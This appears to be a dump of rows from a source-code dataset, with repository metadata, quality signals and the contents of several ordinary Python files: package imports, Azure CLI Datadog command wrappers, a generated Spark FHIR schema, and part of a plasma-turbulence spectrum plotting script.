hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0cf4b2fc1023f5b2635c4bf77ebb83560d77cd89
| 68
|
py
|
Python
|
medical_seg/evaluation/__init__.py
|
920232796/MedicalSeg
|
385ed000c04d828133faeaa9a56ba14488adc8c5
|
[
"Apache-2.0"
] | 11
|
2021-08-23T13:06:59.000Z
|
2022-03-14T09:05:34.000Z
|
medical_seg/evaluation/__init__.py
|
920232796/MedicalSeg
|
385ed000c04d828133faeaa9a56ba14488adc8c5
|
[
"Apache-2.0"
] | null | null | null |
medical_seg/evaluation/__init__.py
|
920232796/MedicalSeg
|
385ed000c04d828133faeaa9a56ba14488adc8c5
|
[
"Apache-2.0"
] | 2
|
2022-01-12T07:58:44.000Z
|
2022-03-15T04:48:57.000Z
|
from .evaluation import *
from .brats import *
from .helper import *
| 22.666667
| 25
| 0.75
| 9
| 68
| 5.666667
| 0.555556
| 0.392157
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161765
| 68
| 3
| 26
| 22.666667
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0b2d9333c1e09a663b3dd44e7429b7a31aa0d4d4
| 9,923
|
py
|
Python
|
src/datadog/azext_datadog/generated/custom.py
|
limingu/azure-cli-extensions
|
1bc29f089f4da42ab8905e440f2f46d6b5b0aa97
|
[
"MIT"
] | null | null | null |
src/datadog/azext_datadog/generated/custom.py
|
limingu/azure-cli-extensions
|
1bc29f089f4da42ab8905e440f2f46d6b5b0aa97
|
[
"MIT"
] | 1
|
2020-07-13T22:08:43.000Z
|
2020-07-13T22:08:43.000Z
|
src/datadog/azext_datadog/generated/custom.py
|
limingu/azure-cli-extensions
|
1bc29f089f4da42ab8905e440f2f46d6b5b0aa97
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=unused-argument
from azure.cli.core.util import sdk_no_wait
def datadog_terms_list(client):
return client.list()
def datadog_api_key_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_api_key_get_default_key(client,
resource_group_name,
monitor_name):
return client.get_default_key(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_api_key_set_default_key(client,
resource_group_name,
monitor_name,
key,
created_by=None,
name=None,
created=None):
return client.set_default_key(resource_group_name=resource_group_name,
monitor_name=monitor_name,
created_by=created_by,
name=name,
key=key,
created=created)
def datadog_host_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_linked_resource_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_monitored_resource_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_monitor_list(client,
resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
def datadog_monitor_show(client,
resource_group_name,
monitor_name):
return client.get(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_monitor_create(client,
resource_group_name,
monitor_name,
location,
tags=None,
identity_type=None,
provisioning_state=None,
monitoring_status=None,
marketplace_subscription_status=None,
datadog_organization_properties=None,
user_info=None,
sku_name=None,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_create,
resource_group_name=resource_group_name,
monitor_name=monitor_name,
tags=tags,
location=location,
type=identity_type,
provisioning_state=provisioning_state,
monitoring_status=monitoring_status,
marketplace_subscription_status=marketplace_subscription_status,
datadog_organization_properties=datadog_organization_properties,
user_info=user_info,
name=sku_name)
def datadog_monitor_update(client,
resource_group_name,
monitor_name,
tags=None,
monitoring_status=None):
return client.update(resource_group_name=resource_group_name,
monitor_name=monitor_name,
tags=tags,
monitoring_status=monitoring_status)
def datadog_monitor_delete(client,
resource_group_name,
monitor_name,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_delete,
resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_refresh_set_password_get(client,
resource_group_name,
monitor_name):
return client.get(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_tag_rule_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_tag_rule_show(client,
resource_group_name,
monitor_name,
rule_set_name):
return client.get(resource_group_name=resource_group_name,
monitor_name=monitor_name,
rule_set_name=rule_set_name)
def datadog_tag_rule_create(client,
resource_group_name,
monitor_name,
rule_set_name,
metric_rules_filtering_tags=None,
log_rules_send_aad_logs=None,
log_rules_send_subscription_logs=None,
log_rules_send_resource_logs=None,
log_rules_filtering_tags=None):
return client.create_or_update(resource_group_name=resource_group_name,
monitor_name=monitor_name,
rule_set_name=rule_set_name,
filtering_tags=metric_rules_filtering_tags,
send_aad_logs=log_rules_send_aad_logs,
send_subscription_logs=log_rules_send_subscription_logs,
send_resource_logs=log_rules_send_resource_logs,
log_rules_filtering_tags=log_rules_filtering_tags)
def datadog_tag_rule_update(client,
resource_group_name,
monitor_name,
rule_set_name,
metric_rules_filtering_tags=None,
log_rules_send_aad_logs=None,
log_rules_send_subscription_logs=None,
log_rules_send_resource_logs=None,
log_rules_filtering_tags=None):
return client.create_or_update(resource_group_name=resource_group_name,
monitor_name=monitor_name,
rule_set_name=rule_set_name,
filtering_tags=metric_rules_filtering_tags,
send_aad_logs=log_rules_send_aad_logs,
send_subscription_logs=log_rules_send_subscription_logs,
send_resource_logs=log_rules_send_resource_logs,
log_rules_filtering_tags=log_rules_filtering_tags)
def datadog_single_sign_on_configuration_list(client,
resource_group_name,
monitor_name):
return client.list(resource_group_name=resource_group_name,
monitor_name=monitor_name)
def datadog_single_sign_on_configuration_show(client,
resource_group_name,
monitor_name,
configuration_name):
return client.get(resource_group_name=resource_group_name,
monitor_name=monitor_name,
configuration_name=configuration_name)
def datadog_single_sign_on_configuration_create(client,
resource_group_name,
monitor_name,
configuration_name,
properties=None,
no_wait=False):
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_group_name=resource_group_name,
monitor_name=monitor_name,
configuration_name=configuration_name,
properties=properties)
def datadog_single_sign_on_configuration_update(instance,
resource_group_name,
monitor_name,
configuration_name,
no_wait=False):
return instance
| 43.143478
| 91
| 0.508616
| 857
| 9,923
| 5.3979
| 0.129522
| 0.168612
| 0.216818
| 0.191959
| 0.760052
| 0.739083
| 0.700821
| 0.654345
| 0.621487
| 0.602032
| 0
| 0
| 0.437569
| 9,923
| 229
| 92
| 43.331878
| 0.828884
| 0.05059
| 0
| 0.628571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0.005714
| 0.005714
| 0.114286
| 0.251429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
0b43f229ad21d445524c4cd3e40e316618b30621
| 22,847
|
py
|
Python
|
spark_fhir_schemas/r4/complex_types/contract_asset.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/contract_asset.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/complex_types/contract_asset.py
|
icanbwell/SparkFhirSchemas
|
8c828313c39850b65f8676e67f526ee92b7d624e
|
[
"Apache-2.0"
] | null | null | null |
from typing import Union, List, Optional
from pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType
# This file is auto-generated by generate_schema so do not edit it manually
# noinspection PyPep8Naming
class Contract_AssetSchema:
"""
Legally enforceable, formally recorded unilateral or bilateral directive i.e.,
a policy or agreement.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = None,
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
include_modifierExtension: Optional[bool] = False,
use_date_for: Optional[List[str]] = None,
parent_path: Optional[str] = "",
) -> Union[StructType, DataType]:
"""
Legally enforceable, formally recorded unilateral or bilateral directive i.e.,
a policy or agreement.
id: Unique id for the element within a resource (for internal references). This
may be any string value that does not contain spaces.
extension: May be used to represent additional information that is not part of the basic
definition of the element. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
modifierExtension: May be used to represent additional information that is not part of the basic
definition of the element and that modifies the understanding of the element
in which it is contained and/or the understanding of the containing element's
descendants. Usually modifier elements provide negation or qualification. To
make the use of extensions safe and manageable, there is a strict set of
governance applied to the definition and use of extensions. Though any
implementer can define an extension, there is a set of requirements that SHALL
be met as part of the definition of the extension. Applications processing a
resource are required to check for modifier extensions.
Modifier extensions SHALL NOT change the meaning of any elements on Resource
or DomainResource (including cannot change the meaning of modifierExtension
itself).
scope: Differentiates the kind of the asset .
type: Target entity type about which the term may be concerned.
typeReference: Associated entities.
subtype: May be a subtype or part of an offered asset.
relationship: Specifies the applicability of the term to an asset resource instance, and
instances it refers to orinstances that refer to it, and/or are owned by the
offeree.
context: Circumstance of the asset.
condition: Description of the quality and completeness of the asset that imay be a factor
in its valuation.
periodType: Type of Asset availability for use or ownership.
period: Asset relevant contractual time period.
usePeriod: Time period of asset use.
text: Clause or question text (Prose Object) concerning the asset in a linked form,
such as a QuestionnaireResponse used in the formation of the contract.
linkId: Id [identifier??] of the clause or question text about the asset in the
referenced form or QuestionnaireResponse.
answer: Response to assets.
securityLabelNumber: Security labels that protects the asset.
valuedItem: Contract Valued Item List.
"""
if extension_fields is None:
extension_fields = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueUrl",
"valueReference",
"valueCodeableConcept",
"valueAddress",
]
from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.r4.complex_types.codeableconcept import (
CodeableConceptSchema,
)
from spark_fhir_schemas.r4.complex_types.reference import ReferenceSchema
from spark_fhir_schemas.r4.complex_types.coding import CodingSchema
from spark_fhir_schemas.r4.complex_types.contract_context import (
Contract_ContextSchema,
)
from spark_fhir_schemas.r4.complex_types.period import PeriodSchema
from spark_fhir_schemas.r4.complex_types.contract_answer import (
Contract_AnswerSchema,
)
from spark_fhir_schemas.r4.simple_types.unsignedint import unsignedIntSchema
from spark_fhir_schemas.r4.complex_types.contract_valueditem import (
Contract_ValuedItemSchema,
)
if (
max_recursion_limit
and nesting_list.count("Contract_Asset") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["Contract_Asset"]
my_parent_path = (
parent_path + ".contract_asset" if parent_path else "contract_asset"
)
schema = StructType(
[
# Unique id for the element within a resource (for internal references). This
# may be any string value that does not contain spaces.
StructField("id", StringType(), True),
# May be used to represent additional information that is not part of the basic
# definition of the element. To make the use of extensions safe and manageable,
# there is a strict set of governance applied to the definition and use of
# extensions. Though any implementer can define an extension, there is a set of
# requirements that SHALL be met as part of the definition of the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# May be used to represent additional information that is not part of the basic
# definition of the element and that modifies the understanding of the element
# in which it is contained and/or the understanding of the containing element's
# descendants. Usually modifier elements provide negation or qualification. To
# make the use of extensions safe and manageable, there is a strict set of
# governance applied to the definition and use of extensions. Though any
# implementer can define an extension, there is a set of requirements that SHALL
# be met as part of the definition of the extension. Applications processing a
# resource are required to check for modifier extensions.
#
# Modifier extensions SHALL NOT change the meaning of any elements on Resource
# or DomainResource (including cannot change the meaning of modifierExtension
# itself).
StructField(
"modifierExtension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Differentiates the kind of the asset .
StructField(
"scope",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# Target entity type about which the term may be concerned.
StructField(
"type",
ArrayType(
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Associated entities.
StructField(
"typeReference",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# May be a subtype or part of an offered asset.
StructField(
"subtype",
ArrayType(
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Specifies the applicability of the term to an asset resource instance, and
# instances it refers to orinstances that refer to it, and/or are owned by the
# offeree.
StructField(
"relationship",
CodingSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
# Circumstance of the asset.
StructField(
"context",
ArrayType(
Contract_ContextSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Description of the quality and completeness of the asset that imay be a factor
# in its valuation.
StructField("condition", StringType(), True),
# Type of Asset availability for use or ownership.
StructField(
"periodType",
ArrayType(
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Asset relevant contractual time period.
StructField(
"period",
ArrayType(
PeriodSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Time period of asset use.
StructField(
"usePeriod",
ArrayType(
PeriodSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Clause or question text (Prose Object) concerning the asset in a linked form,
# such as a QuestionnaireResponse used in the formation of the contract.
StructField("text", StringType(), True),
# Id [identifier??] of the clause or question text about the asset in the
# referenced form or QuestionnaireResponse.
StructField("linkId", ArrayType(StringType()), True),
# Response to assets.
StructField(
"answer",
ArrayType(
Contract_AnswerSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Security labels that protects the asset.
StructField(
"securityLabelNumber",
ArrayType(
unsignedIntSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
# Contract Valued Item List.
StructField(
"valuedItem",
ArrayType(
Contract_ValuedItemSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
)
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
if not include_modifierExtension:
schema.fields = [
c
if c.name != "modifierExtension"
else StructField("modifierExtension", StringType(), True)
for c in schema.fields
]
return schema
| 48.922912
| 104
| 0.528603
| 1,995
| 22,847
| 5.782456
| 0.128321
| 0.063454
| 0.040309
| 0.058252
| 0.792129
| 0.776439
| 0.761703
| 0.741418
| 0.723561
| 0.723561
| 0
| 0.002376
| 0.428853
| 22,847
| 466
| 105
| 49.027897
| 0.881677
| 0.226813
| 0
| 0.674352
| 1
| 0
| 0.026307
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002882
| false
| 0
| 0.0317
| 0
| 0.043228
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0b54bd198fe5b1a5eff5d844bd1b529b5f73b085
| 281
|
py
|
Python
|
models/__init__.py
|
LostInBrittany/experts-app-backend
|
d62a34456e5e876365eee91f1de2e03a3d74827c
|
[
"Apache-2.0"
] | 10
|
2015-10-02T07:35:47.000Z
|
2021-09-08T18:28:13.000Z
|
models/__init__.py
|
LostInBrittany/experts-app-backend
|
d62a34456e5e876365eee91f1de2e03a3d74827c
|
[
"Apache-2.0"
] | 34
|
2015-07-04T20:16:18.000Z
|
2018-04-22T03:11:08.000Z
|
models/__init__.py
|
LostInBrittany/experts-app-backend
|
d62a34456e5e876365eee91f1de2e03a3d74827c
|
[
"Apache-2.0"
] | 5
|
2015-12-17T15:02:09.000Z
|
2022-01-14T18:47:48.000Z
|
from .activity_post import ActivityPost
from .activity_record import ActivityRecord
from .activity_record import ActivityMetaData
from .account import Account
from .activity_type import ActivityType
from .product_group import ProductGroup
from .activity_group import ActivityGroup
| 35.125
| 45
| 0.875445
| 34
| 281
| 7.058824
| 0.441176
| 0.25
| 0.15
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099644
| 281
| 7
| 46
| 40.142857
| 0.948617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0b88502ee31354abb821f307fb66aed3a7fd21b4
| 19,374
|
py
|
Python
|
diagnostics/RRMHD/plot_kspectrum.py
|
ykawazura/calliope
|
343b72a0930d70332172a5d87a579b0f8dcced66
|
[
"MIT"
] | 2
|
2022-02-04T19:27:11.000Z
|
2022-02-05T05:37:38.000Z
|
diagnostics/RRMHD/plot_kspectrum.py
|
ykawazura/calliope
|
343b72a0930d70332172a5d87a579b0f8dcced66
|
[
"MIT"
] | null | null | null |
diagnostics/RRMHD/plot_kspectrum.py
|
ykawazura/calliope
|
343b72a0930d70332172a5d87a579b0f8dcced66
|
[
"MIT"
] | 2
|
2022-02-03T10:45:48.000Z
|
2022-02-03T10:48:28.000Z
|
# -*- coding: utf-8 -*-
from load import *
from fft import *
from plots import *
print('\nplotting kspectrum\n')
outdir = './fig_kspectrum/'
upe2_bin = sum_negative_kz2d(upe2_bin)
bpe2_bin = sum_negative_kz2d(bpe2_bin)
upa2_bin = sum_negative_kz2d(upa2_bin)
bpa2_bin = sum_negative_kz2d(bpa2_bin)
ux2_bin = sum_negative_kz2d(ux2_bin)
uy2_bin = sum_negative_kz2d(uy2_bin)
bx2_bin = sum_negative_kz2d(bx2_bin)
by2_bin = sum_negative_kz2d(by2_bin)
zpep2_bin = sum_negative_kz2d(zpep2_bin)
zpem2_bin = sum_negative_kz2d(zpem2_bin)
zpap2_bin = sum_negative_kz2d(zpap2_bin)
zpam2_bin = sum_negative_kz2d(zpam2_bin)
p_aw_bin = sum_negative_kz2d(p_aw_bin)
p_compr_bin = sum_negative_kz2d(p_compr_bin)
dissip_aw_bin = sum_negative_kz2d(dissip_aw_bin)
dissip_compr_bin = sum_negative_kz2d(dissip_compr_bin)
ntrans_upe_upe_l_bin = sum_negative_kz2d(ntrans_upe_upe_l_bin)
ntrans_bpe_upe_l_bin = sum_negative_kz2d(ntrans_bpe_upe_l_bin)
ntrans_bpe_bpe_l_bin = sum_negative_kz2d(ntrans_bpe_bpe_l_bin)
ntrans_upe_bpe_l_bin = sum_negative_kz2d(ntrans_upe_bpe_l_bin)
ntrans_upa_upa_l_bin = sum_negative_kz2d(ntrans_upa_upa_l_bin)
ntrans_bpa_upa_l_bin = sum_negative_kz2d(ntrans_bpa_upa_l_bin)
ntrans_bpa_bpa_l_bin = sum_negative_kz2d(ntrans_bpa_bpa_l_bin)
ntrans_upa_bpa_l_bin = sum_negative_kz2d(ntrans_upa_bpa_l_bin)
